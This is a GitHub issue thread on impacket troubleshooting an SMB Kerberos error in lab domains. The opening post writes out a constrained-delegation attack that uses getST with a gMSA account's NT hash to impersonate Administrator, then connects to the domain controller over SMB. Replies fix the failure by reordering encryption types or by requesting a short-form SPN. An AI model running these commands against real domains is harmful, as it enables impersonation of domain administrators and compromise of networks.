### ISSUE TITLE
SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED

### ISSUE THREAD

**Issue by OctopusTR** [fortra/impacket#1573]
### Configuration  
impacket version:  v0.10.0
Python version:  3.9.2
Target OS:  Parrot OS

### Debug Output With Command String  

I updated the imppacket version and changed the SPN in different ways. Even in kali I get the same error. I couldn't find the solution, can you help?  
```
┌─[root@Attacker-Machine]─[~]
└──╼ #impacket-getST vulnlab.local/gMSA2$ -hashes :982b0b907cc2d378007240465a57cf2a -spn CIFS/dc01.vulnlab.local -impersonate Administrator -dc-ip dc01.vulnlab.local
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

┌─[root@Attacker-Machine]─[~]
└──╼ #smbclient.py Administrator@dc01.vulnlab.local -k -no-pass -debug
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[+] Impacket Library Installation Path: /root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: Administrator.ccache
[+] Domain retrieved from CCache: vulnlab.local
[+] Returning cached credential for CIFS/DC01.VULNLAB.LOCAL@VULNLAB.LOCAL
[+] Using TGS from cache
Traceback (most recent call last):
  File "/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/smbconnection.py", line 319, in kerberosLogin
    return self._SMBConnection.kerberosLogin(user, password, domain, lmhash, nthash, aesKey, kdcHost, TGT,
  File "/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/smb3.py", line 751, in kerberosLogin
    if ans.isValidAnswer(STATUS_SUCCESS):
  File "/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/smb3structs.py", line 458, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/root/.local/bin/smbclient.py", line 100, in main
    smbClient.kerberosLogin(username, password, domain, lmhash, nthash, options.aesKey, options.dc_ip )
  File "/root/.local/pipx/venvs/impacket/lib/python3.9/site-packages/impacket/smbconnection.py", line 322, in kerberosLogin
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
```

**Comment by 0xElessar** [comment]
Got the same issue " SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)", but using different tool smbclient.py. The error happens during the communication with the domain controller :(

I will try the same scenario in my lab this weekend.

**Comment by r3l4x0** [comment]
RC4 could be the root cause here. After prioritizing the specified `cipher.enctype` by placing it at the top, the issue was resolved in my case.

The code snippet I’m referring to is:

https://github.com/fortra/impacket/blob/084aff60df7e8a5784bee3fb6ac74ed9d1362af8/impacket/krb5/kerberosv5.py#L446-L451

**Comment by Barneee** [comment]
@r3l4x0 I am at the same problem. What exactly do you mean what solved the problem for you. Like changing the lines of code to this?

 ( 
     int(cipher.enctype) 
     int(constants.EncryptionTypes.rc4_hmac.value), 
     int(constants.EncryptionTypes.des3_cbc_sha1_kd.value), 
     int(constants.EncryptionTypes.des_cbc_md5.value), 
     
  )

**Comment by r3l4x0** [comment]
> [@r3l4x0](https://github.com/r3l4x0) I am at the same problem. What exactly do you mean what solved the problem for you. Like changing the lines of code to this?
> 
> ( int(cipher.enctype) int(constants.EncryptionTypes.rc4_hmac.value), int(constants.EncryptionTypes.des3_cbc_sha1_kd.value), int(constants.EncryptionTypes.des_cbc_md5.value),
> 
> )

@Barneee yes that solved it for me. You could go one step further and sort the encryption algorithms by strength, with the previously agreed-upon algorithm remaining in first place. One problem could be that Windows 11 doesn't support RC4.

**Comment by Kuyenda18** [comment]
Another data point that supports @r3l4x0's RC4 root-cause, plus a code-free workaround.

In my case (GOAD lab, DC winterfell, constrained delegation w/ protocol transition), I hit the exact STATUS_MORE_PROCESSING_REQUIRED. Instead of patching impacket, I just requested the ticket with the short SPN (CIFS/winterfell) instead of the FQDN (CIFS/winterfell.north.sevenkingdoms.local) — in both getST.py -spn and when consuming the ticket. It worked immediately.

The reason, confirmed with describeTicket.py:

- FQDN SPN → ticket is rc4_hmac (etype 23) → fails with STATUS_MORE_PROCESSING_REQUIRED
- short SPN → ticket is aes256_cts_hmac_sha1_96 (etype 18) → works

So the underlying problem really is the RC4 service ticket (as @r3l4x0 pointed out). The impacket etype-ordering patch and the "use an SPN form that makes the KDC hand you an AES ticket" trick are two different ways around the same issue. This also explains the well-known GOAD "use winterfell instead of the FQDN" quirk [(mayfly277's](https://mayfly277.github.io/posts/GOADv2-pwning_part1/) writeup) — the short name simply happens to yield an AES ticket.

Whether a given SPN form returns RC4 vs AES depends on the target account's registered SPNs / supported etypes, so it's worth checking your own ticket with describeTicket.py before assuming.
